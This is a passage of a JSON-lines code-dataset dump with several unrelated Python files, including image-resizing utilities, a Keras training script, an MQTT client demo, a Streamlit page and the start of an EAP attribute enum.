run_test_vector_sim(logic_module, [\n ('operandA operandB control result*'),\n (0x0, 0x0, 0x0, 0x0),\n (0x0, 0x0, 0x1, 0x0),\n (0x0, 0x0, 0x2, 0x0),\n (0xffffffff, 0x0, 0x0, 0x0),\n (0xffffffff, 0x0, 0x1, 0xffffffff),\n (0xffffffff, 0x0, 0x2, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x0, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x1, 0xffffffff),\n (0xffffffff, 0xffffffff, 0x2, 0x0)\n ], cmdline_opts)\n","repo_name":"wrs225/Caravel-Vector-Coprocessor-AI","sub_path":"src/FunctionalUnits/sim/block_test/bitwise_operation_unit_test.py","file_name":"bitwise_operation_unit_test.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21721554390","text":"from copy import deepcopy\n\nimport cv2\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torchvision.transforms import InterpolationMode\n\nfrom vidar.utils.data import keys_with, align_corners\nfrom vidar.utils.decorators import iterate1\nfrom vidar.utils.types import is_seq\n\n\n@iterate1\ndef resize_pil(image, shape, interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes input image.\n\n Parameters\n ----------\n image : Image.PIL\n Input image\n shape : tuple [H,W]\n Output shape\n interpolation : int\n Interpolation mode\n\n Returns\n -------\n image : Image.PIL\n Resized image\n \"\"\"\n transform = transforms.Resize(shape, interpolation=interpolation)\n return transform(image)\n\n\n@iterate1\n@iterate1\ndef resize_npy(depth, shape, expand=True):\n \"\"\"\n Resizes depth map.\n\n Parameters\n ----------\n depth : np.array [h,w]\n Depth map\n shape : tuple (H,W)\n Output shape\n expand : bool\n Expand output to [H,W,1]\n\n Returns\n -------\n depth : np.array [H,W]\n Resized depth map\n \"\"\"\n # If a single number is provided, use resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Resize depth map\n depth = cv2.resize(depth, dsize=tuple(shape[::-1]), interpolation=cv2.INTER_NEAREST)\n # Return resized depth map\n return np.expand_dims(depth, axis=2) if expand else depth\n\n\n@iterate1\ndef resize_npy_preserve(depth, shape):\n \"\"\"\n Resizes depth map preserving all valid depth pixels\n Multiple downsampled points can be assigned to the same pixel.\n\n Parameters\n ----------\n depth : np.array [h,w]\n Depth map\n shape : tuple (H,W)\n Output shape\n\n Returns\n -------\n depth : np.array [H,W,1]\n Resized depth map\n \"\"\"\n # If a single number is provided, use resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Store dimensions and reshapes to single column\n depth = np.squeeze(depth)\n h, w = depth.shape\n x = depth.reshape(-1)\n # Create coordinate grid\n uv = np.mgrid[:h, :w].transpose(1, 2, 0).reshape(-1, 2)\n # Filters valid points\n idx = x > 0\n crd, val = uv[idx], x[idx]\n # Downsamples coordinates\n crd[:, 0] = (crd[:, 0] * (shape[0] / h)).astype(np.int32)\n crd[:, 1] = (crd[:, 1] * (shape[1] / w)).astype(np.int32)\n # Filters points inside image\n idx = (crd[:, 0] < shape[0]) & (crd[:, 1] < shape[1])\n crd, val = crd[idx], val[idx]\n # Creates downsampled depth image and assigns points\n depth = np.zeros(shape)\n depth[crd[:, 0], crd[:, 1]] = val\n # Return resized depth map\n return np.expand_dims(depth, axis=2)\n\n\n@iterate1\ndef resize_torch_preserve(depth, shape):\n if depth.dim() == 4:\n return torch.stack([resize_torch_preserve(depth[i], shape)\n for i in range(depth.shape[0])], 0)\n # If a single number is provided, use resize ratio\n if not is_seq(shape):\n shape = tuple(int(s * shape) for s in depth.shape)\n # Store dimensions and reshapes to single column\n c, h, w = depth.shape\n # depth = np.squeeze(depth)\n # h, w = depth.shape\n x = depth.reshape(-1)\n # Create coordinate grid\n uv = np.mgrid[:h, :w].transpose(1, 2, 0).reshape(-1, 2)\n # Filters valid points\n idx = x > 0\n crd, val = uv[idx], x[idx]\n # Downsamples coordinates\n crd[:, 0] = (crd[:, 0] * (shape[0] / h)).astype(np.int32)\n crd[:, 1] = (crd[:, 1] * (shape[1] / w)).astype(np.int32)\n # Filters points inside image\n idx = (crd[:, 0] < shape[0]) & (crd[:, 1] < shape[1])\n crd, val = crd[idx], val[idx]\n # Creates downsampled depth image and assigns points\n depth = torch.zeros(shape, device=depth.device, dtype=depth.dtype)\n depth[crd[:, 0], crd[:, 1]] = val\n # Return resized depth map\n return depth.unsqueeze(0)\n\n\n@iterate1\n@iterate1\ndef resize_npy_multiply(data, shape):\n if data is None:\n return data\n ratio_w = shape[0] / data.shape[0]\n ratio_h = shape[1] / data.shape[1]\n out = resize_npy(data, shape, expand=False)\n out[..., 0] *= ratio_h\n out[..., 1] *= ratio_w\n return out\n\n\n@iterate1\ndef resize_intrinsics(intrinsics, original, resized):\n \"\"\"\n Resize camera intrinsics matrix to match a target resolution\n\n Parameters\n ----------\n intrinsics : np.array [3,3]\n Original intrinsics matrix\n original : tuple [W,H]\n Original image resolution\n resized : tuple [w,h]\n Target image resolution\n Returns\n -------\n intrinsics : np.array [3,3]\n Resized intrinsics matrix\n \"\"\"\n intrinsics = np.copy(intrinsics)\n\n ratio_w = resized[0] / original[0]\n ratio_h = resized[1] / original[1]\n\n intrinsics[0, 0] *= ratio_w\n intrinsics[1, 1] *= ratio_h\n\n # if align_corners():\n intrinsics[0, 2] = intrinsics[0, 2] * ratio_w\n intrinsics[1, 2] = intrinsics[1, 2] * ratio_h\n # else:\n # intrinsics[0, 2] = (intrinsics[0, 2] - 0.5) * ratio_w + 0.5\n # intrinsics[1, 2] = (intrinsics[1, 2] - 0.5) * ratio_h + 0.5\n\n return intrinsics\n\n\ndef resize_sample_input(sample, shape, shape_supervision=None,\n depth_downsample=1.0, preserve_depth=False,\n pil_interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes the input information of a sample (i.e. that go to the networks)\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n shape_supervision : tuple (H,W)\n Output supervision shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n pil_interpolation : int\n Interpolation mode\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Intrinsics\n for key in keys_with(sample, 'intrinsics', without='raw'):\n # if f'{key}_raw' not in sample.keys():\n # sample[f'{key}_raw'] = deepcopy(sample[key])\n sample[key] = resize_intrinsics(sample[key], list(sample['rgb'].values())[0].size, shape[::-1])\n # RGB\n for key in keys_with(sample, 'rgb', without='raw'):\n sample[key] = resize_pil(sample[key], shape, interpolation=pil_interpolation)\n # Mask\n for key in keys_with(sample, 'mask', without='raw'):\n sample[key] = resize_pil(sample[key], shape, interpolation=InterpolationMode.NEAREST)\n # Input depth\n for key in keys_with(sample, 'input_depth'):\n shape_depth = [int(s * depth_downsample) for s in shape]\n resize_npy_depth = resize_npy_preserve if preserve_depth else resize_npy\n sample[key] = resize_npy_depth(sample[key], shape_depth)\n return sample\n\n\ndef resize_sample_supervision(sample, shape, depth_downsample=1.0, preserve_depth=False):\n \"\"\"\n Resizes the output information of a sample (i.e. ground-truth supervision)\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Depth\n for key in keys_with(sample, 'depth', without='input_depth'):\n shape_depth = [int(s * depth_downsample) for s in shape]\n resize_npy_depth = resize_npy_preserve if preserve_depth else resize_npy\n sample[key] = resize_npy_depth(sample[key], shape_depth)\n # Normals\n for key in keys_with(sample, 'normals'):\n shape_normals = [int(s * depth_downsample) for s in shape]\n sample[key] = resize_npy(sample[key], shape_normals)\n # Semantic\n for key in keys_with(sample, 'semantic'):\n sample[key] = resize_npy(sample[key], shape, expand=False)\n # Optical flow\n for key in keys_with(sample, 'optical_flow'):\n sample[key] = resize_npy_multiply(sample[key], shape)\n # Scene flow\n for key in keys_with(sample, 'scene_flow'):\n sample[key] = resize_npy(sample[key], shape, expand=False)\n # Return resized sample\n return sample\n\n\ndef resize_sample(sample, shape, shape_supervision=None, depth_downsample=1.0, preserve_depth=False,\n pil_interpolation=InterpolationMode.LANCZOS):\n \"\"\"\n Resizes a sample, including image, intrinsics and depth maps.\n\n Parameters\n ----------\n sample : dict\n Dictionary with sample values (output from a dataset's __getitem__ method)\n shape : tuple (H,W)\n Output shape\n shape_supervision : tuple (H,W)\n Output shape\n depth_downsample: float\n Resize ratio for depth maps\n preserve_depth : bool\n Preserve depth maps when resizing\n pil_interpolation : int\n Interpolation mode\n\n Returns\n -------\n sample : dict\n Resized sample\n \"\"\"\n # Resize input information\n sample = resize_sample_input(sample, shape,\n depth_downsample=depth_downsample,\n preserve_depth=preserve_depth,\n pil_interpolation=pil_interpolation)\n # Resize output information\n sample = resize_sample_supervision(sample, shape_supervision,\n depth_downsample=depth_downsample,\n preserve_depth=preserve_depth)\n # Return resized sample\n return sample\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/datasets/augmentations/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"72442667609","text":"import json\n\n\nclass NextObservationTaskAjaxModel(object):\n def __init__(self, case, glad_cluster, area, overlays):\n self.case = case.to_dict(exclude=['glad_cluster', 'creation_time'])\n self.case['case_id'] = case.key.id()\n self.glad_cluster = {\n \"cluster_id\": glad_cluster.key.id(),\n \"geojson\": glad_cluster.geojson\n }\n self.overlays = []\n for overlay in overlays:\n self.overlays.append(overlay.to_dict)\n self.area_id = area.key.id()\n\n def to_JSON(self):\n return json.dumps({\n \"case\": self.case,\n \"glad_cluster\": self.glad_cluster,\n \"area_id\": self.area_id,\n \"overlays\": self.overlays\n })\n\n\nclass BaseRouter(object):\n def _select_case_to_use_for_next_observation_task(self, user):\n pass\n\n def get_next_observation_task(self, user):\n return self._select_case_to_use_for_next_observation_task(user)\n","repo_name":"intotecho/bunjilforestwatch","sub_path":"bunjilforestwatch/observation_task_routers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"32247801459","text":"from multiprocessing import Pool\n\nimport os,time,random\n\ndef long_time_task(name):\n print('run task %s on (%s)'%(name,os.getpid()))\n start = time.time()\n time.sleep(random.random()*3)\n end = time.time()\n take_time = end - start\n print('Task %s cost %f second'%(name,take_time))\n\nif __name__ == '__main__':\n print('Parent process %s'%os.getpid())\n p = Pool(10) #选择自己想要的进程数\n for i in range(10):\n p.apply_async(long_time_task,args=(i,))\n print('wait for success')\n p.close()\n p.join()\n print('all ok')","repo_name":"yeyeyeyey/my_dev","sub_path":"django_learn/django_start/python_learn/day9进程&线程/进程池.py","file_name":"进程池.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1227767700","text":"import argparse\nfrom subprocess import call\nimport ROOT\nimport os, sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n#######\n#BELOW CODE IS OPTIMIZED FOR TENSORFLOW-2.4.1!\n#######\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout\nfrom tensorflow.keras.layers import Add, Lambda\nfrom tensorflow.keras.constraints import max_norm\n#from tf.keras.layers.noise import GaussianNoise\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras import initializers\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.losses import BinaryCrossentropy\nfrom tensorflow.keras.optimizers import Adadelta\nfrom tensorflow.keras.metrics import AUC\nfrom tensorflow.keras.utils import plot_model\nimport sys\nsys.path.append(os.environ[\"DIR_PATH\"])\nfrom root_data_loader import load_data, classWtoSampleW\n\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport tensorflow as tf\nimport optuna\nimport plotly\n\n\nprint('training using keras')\nvarlist_prekin = ['had_t_b_pt','w_u_pt','w_d_pt','lep_t_b_pt','had_t_b_bscore','lep_t_b_bscore',\n 'theta_w_u_w_d','theta_lep_neu','theta_lep_w_lep_t_b', 'del_phi_had_t_lep_t',\n 'had_t_mass','had_w_mass','lep_t_mass','lep_t_partial_mass']\nvarlist = varlist_prekin + ['chi2']\n\nclass mva_variable():\n def __init__(self, name, title, units, type=\"F\", isSpectator=False):\n self.name = name\n self.title = title\n self.units = units\n self.type = type\n self.isSpectator = isSpectator\n\n\nvarlist = [#mva_variable(\"n_jets\", \"n_jets\", \"#\", isSpectator=True),\n mva_variable(\"had_t_b_pt\", \"had_t_b_pt\", \"GeV\"),\n mva_variable(\"w_u_pt\", \"w_u_pt\", \"GeV\"),\n mva_variable(\"w_d_pt\", \"w_d_pt\", \"GeV\"),\n mva_variable(\"lep_t_b_pt\", \"lep_t_b_pt\", \"GeV\"),\n mva_variable(\"had_t_b_bscore\", \"had_t_b_bscore\", \"points\"),\n mva_variable(\"lep_t_b_bscore\", \"lep_t_b_bscore\", \"points\"),\n mva_variable(\"theta_w_u_w_d\", \"theta_w_u_w_d\", \"Rad.\"),\n mva_variable(\"theta_lep_neu\", \"theta_lep_neu\", \"Rad.\"),\n mva_variable(\"theta_lep_w_lep_t_b\", \"theta_lep_w_lep_t_b\", \"Rad.\"),\n mva_variable(\"del_phi_had_t_lep_t\", \"del_phi_had_t_lep_t\", \"Rad.\"),\n mva_variable(\"had_t_mass\", \"had_t_mass\", \"GeV\"),\n mva_variable(\"had_w_mass\", \"had_w_mass\", \"GeV\"),\n mva_variable(\"lep_t_mass\", \"lep_t_mass\", \"GeV\"),\n mva_variable(\"lep_t_partial_mass\", \"lep_t_partial_mass\", \"GeV\")\n ]\n\nvarlist_prekin = ['pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b','bvsc_had_t_b','bvsc_lep_t_b',\n 'theta_w_u_w_d','theta_lep_neu','theta_lep_w_lep_t_b', 'del_phi_had_t_lep_t',\n 'had_t_mass','had_w_mass','lep_t_mass','lep_t_partial_mass','pt_ratio']\nvarlist = varlist_prekin + ['chi2']\n\n\n\n# Define initialization\ndef normal(shape, name=None):\n return initializers.normal(shape, scale=0.05, name=name)\n\n# Generate model\nclass KerasModel():\n\n def __init__(self):\n self.model = Sequential()\n\n\n def defineModel_3layer(self,input_dim_,depth,neuron_exponent,maxnorm):\n K.clear_session()\n # Define model\n\n #\n # we can think of this chunk as the input layer\n self.model.add(Lambda(lambda X : X, input_shape=(input_dim_,))) #dummy Lamda layer for test\n for i in range(depth):\n self.model.add(Dense(pow(2,neuron_exponent+1), kernel_initializer=initializers.he_normal(seed=1232), kernel_constraint=max_norm(maxnorm)))\n self.model.add(BatchNormalization())\n self.model.add(Activation('elu'))\n self.model.add(Dropout(0.50))\n\n self.model.add(Dense(pow(2,neuron_exponent), kernel_initializer=initializers.he_normal(seed=1232), kernel_constraint=max_norm(maxnorm)))\n self.model.add(BatchNormalization())\n self.model.add(Activation('elu'))\n self.model.add(Dropout(0.50))\n\n\n # we can think of this chunk as the output layer\n self.model.add(Dense(1, kernel_initializer=initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=1234)))\n self.model.add(Activation('sigmoid'))\n\n #self.model.add(Dense(64, kernel_initializer=initializers.he_normal(seed=None), activation='relu', input_dim=input_dim_))\n #self.model.add(Dense(32, kernel_initializer=initializers.he_normal(seed=None), activation='relu'))\n #self.model.add(Dense(2, kernel_initializer=initializers.he_normal(seed=None), activation='softmax'))\n\n def compile(self,optimizer_,lossftn=BinaryCrossentropy(),\n #optimizer_=SGD(lr=0.1,decay=1e-5),\n # default lr=0.001\n #optimizer_=Adam(lr=0.1, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.1),\n #optimizer_=Nadam(lr=0.002, beta_1=0.9, beta_2=0.999, epsilon=None, schedule_decay=0.004),\n metrics_=['AUC'] ):\n # Set loss and optimizer\n self.model.compile(loss=lossftn, optimizer=optimizer_, metrics=metrics_)\n\n def save(self, modelName=\"model.h5\"):\n self.model.save(modelName)\n\n def summary(self):\n self.model.summary()\n\n def plot_mymodel(self,outFile='model.png'):\n print('plot model............')\n try:\n plot_model(self.model, to_file=outFile, show_shapes = False)\n except:\n print('[INFO] Failed to make model plot')\n \n\n\n\ndef objective_keras(trial: optuna.Trial, data):\n param = {\n 'depth':trial.suggest_int('depth',3,5),\n 'neuron_exponent':trial.suggest_int('neuron_exponent',3,5),\n #'rho':trial.suggest_uniform('rho',0.3,0.99),\n #'epsilon':trial.suggest_uniform('epsilon',1e-10,1e-7),\n 'batch_size':trial.suggest_categorical('batch_size',[pow(2,i) for i in range(9,15)]),\n 'max_norm':trial.suggest_float('max_norm',1,10)\n }\n modelDNN = KerasModel()\n modelDNN.defineModel_3layer(len(varlist_prekin) if chk_pre_kin else len(varlist),param['depth'],param['neuron_exponent'],param['max_norm'])\n optimizer=Adadelta(learning_rate=1.0, rho=0.95, epsilon=1e-7, clipnorm=0.1)\n #optimizer.build(modelDNN.model.trainable_variables)\n modelDNN.compile(optimizer_=optimizer)\n \n #optimizer_=Adadelta(learning_rate=1.0, rho=param['rho'], epsilon=param['epsilon'], decay=0.0, clipnorm=0.1)\n \n EPOCHS_SIZE = 1000\n BATCH_SIZE = param['batch_size']\n early_stopping = EarlyStopping(\n monitor='val_auc', \n verbose=1,\n patience=10,\n mode='max',\n restore_best_weights=True)\n modelDNN.model.fit(data['train_features'],data['train_y'],epochs=EPOCHS_SIZE,batch_size=BATCH_SIZE,callbacks=[early_stopping],validation_data=(data['val_features'],data['val_y']))\n modelDNN.plot_mymodel(outFile=f'model_trial_{trial.number}.png')\n test_result = modelDNN.model.evaluate(data['test_features'],data['test_y'],batch_size=1, verbose = 0)\n print(modelDNN.model.metrics_names)\n print(test_result)\n del modelDNN\n return test_result[1]\n \nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--n_jet', type=int)\n parser.add_argument('--pre_kin', type=int)\n args = parser.parse_args()\n n_jet = args.n_jet\n chk_pre_kin = True if args.pre_kin else False\n\n print(chk_pre_kin, n_jet)\n \n path_sample = os.environ[\"WtoCB_PATH\"]\n #filename = 'Vcb_Mu_TTLJ_WtoCB_powheg_25.root'\n filename = 'Vcb_Mu_TTLJ_WtoCB_powheg.root' \n data = load_data(os.path.join(path_sample,filename),n_jet,varlist_prekin if chk_pre_kin else varlist,0.2,0.2)\n # optuna.logging.set_verbosity(optuna.logging.DEBUG)\n # study = optuna.create_study(direction='maximize', sampler=optuna.samplers.TPESampler())\n # study.optimize(lambda trial: objective_keras(trial, data),n_trials=20)\n # fig_contour = optuna.visualization.plot_contour(study)\n # fig_importance = optuna.visualization.plot_param_importances(study)\n # fig_contour.write_html(f'opt_contour.html')\n # fig_importance.write_html(f'opt_importance.html')\n # print(f\"here is the result of hyperparameter tuning, best score = {study.best_value}:\\n\")\n # print(study.best_trial.params)\n # param = study.best_params\n param = {}\n param['depth'] = 3\n param['neuron_exponent'] = 3\n param['max_norm'] = 1\n param['batch_size'] = 2048\n modelDNN = KerasModel()\n modelDNN.defineModel_3layer(len(varlist_prekin) if chk_pre_kin else len(varlist),param['depth'],param['neuron_exponent'],param['max_norm'])\n optimizer=Adadelta(learning_rate=1.0, rho=0.95, epsilon=1e-7, clipnorm=0.1)\n #optimizer.build(modelDNN.model.trainable_variables)\n modelDNN.compile(optimizer_=optimizer)\n\n EPOCHS_SIZE = 1000\n BATCH_SIZE = param['batch_size']\n early_stopping = EarlyStopping(\n monitor='val_loss', \n verbose=1,\n patience=20,\n mode='auto',\n restore_best_weights=True)\n modelDNN.model.fit(data['train_features'],data['train_y'],epochs=EPOCHS_SIZE,batch_size=BATCH_SIZE,callbacks=[early_stopping],validation_data=(data['val_features'],data['val_y']))\n modelDNN.save()\n modelDNN.plot_mymodel(outFile='plot.png')\n \n \n\n","repo_name":"kyj519/VcbMVAStudy","sub_path":"keras/Permutation_MVA.py","file_name":"Permutation_MVA.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16899422638","text":"import numpy as np\nimport pandas as pd\nfrom scipy import io\nimport glob\nimport matplotlib.pylab as plt\nfrom matplotlib import rc\nfont = {'family': 'Times New Roman ',\n 'weight': 'bold',\n 'size': 28}\nrc('font', **font)\n\n# lc = io.loadmat(r'G:\\Research\\Gridded Data\\PDSI\\lc.mat')['lc']\nfiles = glob.glob(r'D:\\Research\\modelling\\model_development1\\RFR-LUE-GPP\\*.npy')\nfiles1 = glob.glob(r'D:\\Research\\modelling\\model_development1\\tower-LUE-GPP\\*.npy')\nfiles2 = glob.glob(r'D:\\Research\\modelling\\model_development1\\RandomForest_GPP\\*.npy')\n# data = np.load(files1[0])\n# plt.imshow(data)\n# plt.colorbar()\n# plt.show()\ndef AverageGpp(file):\n data = np.zeros([len(file), 360, 720], dtype=float)\n for i in range(0, len(file)):\n data[i, :, :] = np.load(file[i])\n gpp = np.sum(data, axis=0) / 6\n gpp = np.ma.masked_where(gpp == 0, gpp)\n return gpp\n\n''' get tower GPP data'''\ndef getGpp( year):\n year = str(year)\n df = pd.read_csv(\"D:\\Research\\modelling\\machine learning\\gpp.monthly.csv\")\n gppValue = {}\n totalSite = 0\n # for item in df.columns:\n # if np.isnan(df.ix[0, item]):\n # df.ix[0, item] = 0\n # df = df.interpolate(method='linear', axis=1)\n\n for item in df.columns[1:]:\n site, yr = item.split('.')\n if yr == year:\n dfSite = df[item].interpolate(method='linear')\n if np.any(dfSite.as_matrix() is np.nan):\n pass\n else:\n totalSite += 1\n gppValue[site] = np.mean(df[item].as_matrix());\n gpp=pd.DataFrame.from_dict(gppValue,orient='index')\n return gpp\n\ndef gridToPoint(lat, lon):\n if -90 <= lat <= 90:\n lat = 90 - lat\n lat_ind = int(lat // 0.5)\n\n if -180 <= lon <= 180:\n lon += 180\n lon_ind = int(lon // 0.5)\n return lat_ind, lon_ind\n\n#-------Main funtion starts here----------------------------------------------------------\n'''get the tower GPP from 2000-2005'''\ndf1 = getGpp(2000)\ndf2 = getGpp(2001)\ndf3 = getGpp(2002)\ndf4 = getGpp(2003)\ndf5 = getGpp(2004)\ndf6 = getGpp(2005)\n#\nresult = pd.concat([df1,df2,df3,df4,df5,df6],axis = 1, join ='outer')\n\n'''get the modeled GPP by from different RFR-LUE-GPP model, tower-LUE-GPP model and FRF-GPP model'''\nrfrLUEgpp = AverageGpp(files)*30/365.0\ntowerLUEgpp =AverageGpp(files1)/365.0\nrfrGpp = AverageGpp(files2)*6*30/365.0\n# plt.imshow(rfrGpp)\n# plt.colorbar()\n# plt.show()\n# #\ndf1 = pd.ExcelFile(r\"D:\\Research\\modelling\\machine learning\\fluxnet_2004-2005-monthly.xlsx\", header=0, index_col=0,\n parse_cols=0, has_index_name=True)\ndf1 = pd.ExcelFile.parse(df1, header=0)\nsiteName = df1.site_id\nsiteLat = {}\nsiteLon = {}\nsiteVeg = {}\nrfrLUE_DownGPP = {}\ntowerLUE_DownGPP = {}\nRFR_DownGPP = {}\nfor s in result.index:\n cnt = 0\n for site in siteName:\n if (s == site):\n latitude = df1.latitude.as_matrix()[cnt]\n siteLat[site] = latitude\n longitude = df1.longitude.as_matrix()[cnt]\n siteLon[site] = longitude\n siteVeg[site] = df1.igbp_veg_type.as_matrix()[cnt]\n indRow, indCol = gridToPoint(latitude,longitude)\n rfrLUE_DownGPP[site] = rfrLUEgpp[indRow,indCol]\n towerLUE_DownGPP[site] = towerLUEgpp[indRow,indCol]\n RFR_DownGPP[site] = rfrGpp[indRow,indCol]\n cnt += 1\nlat=pd.DataFrame.from_dict(siteLat,orient='index')\nlon = pd.DataFrame.from_dict(siteLon, orient='index')\nveg = pd.DataFrame.from_dict(siteVeg, orient='index')\nrfrLUEdf = pd.DataFrame.from_dict(rfrLUE_DownGPP,orient='index')\ntowerLUEdf = pd.DataFrame.from_dict(towerLUE_DownGPP,orient='index')\nRFRdf = pd.DataFrame.from_dict(RFR_DownGPP,orient='index')\nresult = pd.concat([veg,lat,lon,result,rfrLUEdf,towerLUEdf,RFRdf], axis = 1, join = 'inner')\nresult.to_excel('results.xlsx')\n","repo_name":"Suhua/Land-GPP-model-python","sub_path":"Final-project/modelObservationCompare.py","file_name":"modelObservationCompare.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17174251876","text":"# -*- coding: utf-8 -*-\n# 以下代码在2019年2月28日 python3.6环境下运行通过\nimport paho.mqtt.client as mqtt\nimport json\nimport time\n\n# HOST = \"192.168.0.12\"\nHOST = \"localhost\"\nPORT = 1883\nclient_id = \"1083421xxxxx\" # 没有就不写,此处部分内容用xxx代替原内容,下同\n\n\n# 连接 mqtt服务器\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"data/receive\") # 订阅消息\n\n# 消息处理函数\ndef on_message(client, userdata, msg):\n print(\"主题:\"+msg.topic+\" 消息:\"+str(msg.payload.decode('utf-8')))\n\n# publish 消息\ndef on_subscribe(client, userdata, mid, granted_qos):\n print(\"On Subscribed: qos = %d\" % granted_qos)\n\n# 断开连接\ndef on_disconnect(client, userdata, rc):\n if rc != 0:\n print(\"Unexpected disconnection %s\" % rc)\n\ndata = {\n \"type\":2,\n \"timestamp\": time.time(),\n \"messageId\":\"9fcda359-89f5-4933-xxxx\",\n \"command\":\"xx/recommend\",\n \"data\":{\n \"openId\":\"xxxx\",\n \"appId\":'xxxx',\n \"recommendType\":\"temRecommend\"\n }\n}\nparam = json.dumps(data)\nclient = mqtt.Client(client_id)\nclient.username_pw_set(\"xxxxxx\", \"xxxxxx\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_subscribe = on_subscribe\nclient.on_disconnect = on_disconnect\nclient.connect(HOST, PORT, 60)\nclient.publish(\"data/send\", payload=param, qos=0) # 发送消息\nclient.loop_forever()\n\n","repo_name":"Xiaochaosui/python_learning","sub_path":"tools/mqtt使用.py","file_name":"mqtt使用.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"27030118660","text":"#함수\ndef output(n, m, edges, array):\n\tcheck = n//2\n\tedge_y = dict()\n\t\n\tfor i in range(m):\n\t\tkey = edges[i][1]\n\t\tif key in edge_y:\n\t\t\tedge_y[key].append(edges[i][0])\n\t\telse : \n\t\t\tedge_y[key] = [edges[i][0]]\n\t\n\tfor key in edge_y.keys():\n\t\tedge_y[key].sort()\n\t#nlogn\n\tkey_order = list(edge_y.keys())\n\tkey_order.sort(reverse=True)\n\t\n\tfor key in key_order:\n\t\tif check in edge_y[key] : \n\t\t\tcheck+=1\n\t\telif (check-1) in edge_y[key]:\n\t\t\tcheck-=1\n\treturn array[check]\n#입력\nn, m = tuple(map(int, input().split()))\narray = list(map(int, input().split()))\nedges = [ tuple(map(int, input().split())) for _ in range(m)]\n#출력\nprint(output(n, m, edges, array))","repo_name":"Kim-Ju-won/AdvancedAlgorithmTechniques","sub_path":"기말고사/사다리_타기/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28298849182","text":"import streamlit as st\r\n\r\nst.title(\"Welcome to Cat Kibble Box -CKB\")\r\n\r\nstatus = st.header(\"What would you like to do? \")\r\nkibblepi = st.selectbox(\"Kibble-Box: \", [\"Box001\", \"Box002\", \"Box003\"])\r\n\r\nst.write(\"Your Kibble-box is: \", kibblepi)\r\n\r\noptions = st.multiselect(\"Options available: \", [\"Camera\", \"Email\", \"Eat\"])\r\n\r\nst.write(\"You selected\", len(options), \"options\")\r\n\r\n\r\nst.write(\r\n f\"\"\"\r\n \r\n \r\n \r\n \"\"\",\r\n unsafe_allow_html=True,\r\n)\r\nst.write(\r\n f\"\"\"\r\n \r\n \r\n \r\n \"\"\",\r\n unsafe_allow_html=True,\r\n)\r\n\r\n","repo_name":"devrulls/kibblepi","sub_path":"webapp/webapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2381750798","text":"import hashlib\nimport hmac\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Union\n\nimport ordering\n\n\nclass AttributeType(Enum):\n UNKNOWN = 0\n AT_RAND = 1\n AT_AUTN = 2\n AT_RES = 3\n AT_AUTS = 4\n AT_PADDING = 6\n AT_NONCE_MT = 7\n AT_PERMANENT_ID_REQ = 10\n AT_MAC = 11\n AT_NOTIFICATION = 12\n AT_ANY_ID_REQ = 13\n AT_IDENTITY = 14\n AT_VERSION_LIST = 15\n AT_SELECTED_VERSION = 16\n AT_FULLAUTH_ID_REQ = 17\n AT_COUNTER = 19\n AT_COUNTER_TOO_SMALL = 20\n AT_NONCE_S = 21\n AT_CLIENT_ERROR_CODE = 22\n AT_IV = 129\n AT_ENCR_DATA = 130\n AT_NEXT_PSEUDONYM = 132\n AT_NEXT_REAUTH_ID = 133\n AT_CHECKCODE = 134\n AT_RESULT_IND = 135\n\n\n@dataclass\nclass Attribute:\n \"\"\"\n Attribute Type\n\n 